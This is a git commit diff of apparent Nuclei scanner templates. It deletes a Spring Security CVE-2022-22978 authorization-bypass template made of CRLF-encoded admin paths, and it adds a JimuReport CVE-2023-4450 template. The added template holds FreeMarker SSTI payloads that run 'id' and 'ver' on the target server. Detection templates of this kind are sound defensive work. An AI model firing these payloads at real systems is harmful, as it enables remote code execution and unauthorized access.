Fixed issues for CVE-2023-4450

2024-07-12 18:07:54 -07:00 · 2024-07-12 18:07:54 -07:00 · 854db63756
parent d4cb081992
commit 854db63756
2 changed files with 57 additions and 55 deletions
--- a/http/cves/2022/CVE-2022-22978.yaml
+++ b/http/cves/2022/CVE-2022-22978.yaml
@ -1,55 +0,0 @@
-id: CVE-2022-22978
-
-info:
-  name: Spring Security RegexRequestMatcher Authorization Bypass
-  author: Sumanth Vankineni
-  severity: critical
-  description: |
-    In Spring Security versions prior to 5.4.11, 5.5.7, 5.6.4, and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.
-  impact: |
-    Successful exploitation of this vulnerability allows an attacker to bypass authorization checks and access restricted endpoints.
-  remediation: |
-    Upgrade to Spring Security version 5.4.11, 5.5.7, 5.6.4, or later to mitigate this vulnerability.
-  reference:
-    - https://tanzu.vmware.com/security/cve-2022-22978
-    - https://github.com/DeEpinGh0st/CVE-2022-22978
-    - https://snyk.io/blog/spring-security-authorization-bypass-cve-2022-31692/
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2022-22978
-    cwe-id: CWE-287
-    epss-score: 0.89
-    epss-percentile: 0.99
-    cpe: cpe:2.3:a:pivotal_software:spring_security:*:*:*:*:*:*:*:*
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/admin/%0atest"
-      - "{{BaseURL}}/admin/%0dtest"
-      - "{{BaseURL}}/admin/index%0a"
-      - "{{BaseURL}}/admin/index%0d"
-      - "{{BaseURL}}/admin/%0aindex"
-      - "{{BaseURL}}/admin/%0dindex"
-      - "{{BaseURL}}/admin/%0atest.html"
-      - "{{BaseURL}}/admin/%0dtest.html"
-      - "{{BaseURL}}/admin/%0a.jsp"
-      - "{{BaseURL}}/admin/%0d.jsp"
-      - "{{BaseURL}}/admin/.%0a"
-      - "{{BaseURL}}/admin/.%0d"
-      - "{{BaseURL}}/admin/test/%0a"
-      - "{{BaseURL}}/admin/test/%0d"
-      - "{{BaseURL}}/admin/dashboard/%0a"
-      - "{{BaseURL}}/admin/dashboard/%0d"
-      - "{{BaseURL}}/admin/config/%0a"
-      - "{{BaseURL}}/admin/config/%0d"
-      - "{{BaseURL}}/admin/settings/%0a"
-      - "{{BaseURL}}/admin/settings/%0d"
-      - "{{BaseURL}}/admin/secure/%0a"
-      - "{{BaseURL}}/admin/secure/%0d"
-    stop-at-first-match: true
-    matchers:
-      - type: status
-        status:
-          - 200
--- a/http/cves/2023/CVE-2023-4450.yaml
+++ b/http/cves/2023/CVE-2023-4450.yaml
@ -0,0 +1,57 @@
+id: 'CVE-2023-4450'
+
+info:
+  name: 'JimuReport FreeMarker SSTI RCE (CVE-2023-4450)'
+  author: 'Sumanth Vankineni'
+  severity: critical
+  description: |
+    A vulnerability was found in jeecgboot JimuReport up to version 1.6.0. It has been declared as critical. Affected by this vulnerability is the Template Handler component. The vulnerability allows for server-side template injection (SSTI), leading to arbitrary code execution. The attack can be launched remotely. This exploit has been disclosed to the public and may be used. Upgrading to version 1.6.1 addresses this issue. It is recommended to upgrade the affected component.
+    
+    - NVD CVSS Score: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
+    - VulDB CVSS Score: 6.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
+    
+    References:
+      - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9
+      - https://whoopsunix.com/docs/java/named%20module/
+      - VDB-237571
+  tags: jimureport, ssti, rce, freemarker, cve-2023-4450
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/jmreport/queryFieldBySql"
+    headers:
+      Content-Type: application/json
+      User-Agent: Nuclei
+    body: |
+      {
+        "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'"
+      }
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "result: uid=[0-9]+\\(.*\\) gid=[0-9]+\\(.*\\) groups=[0-9]+\\(.*\\)"
+        part: body
+      - type: status
+        status:
+          - 200
+  - method: POST
+    path:
+      - "{{BaseURL}}/jmreport/queryFieldBySql"
+    headers:
+      Content-Type: application/json
+      User-Agent: Nuclei
+    body: |
+      {
+        "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"ver\")}'"
+      }
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "result: .*Windows.*"
+        part: body
+      - type: status
+        status:
+          - 200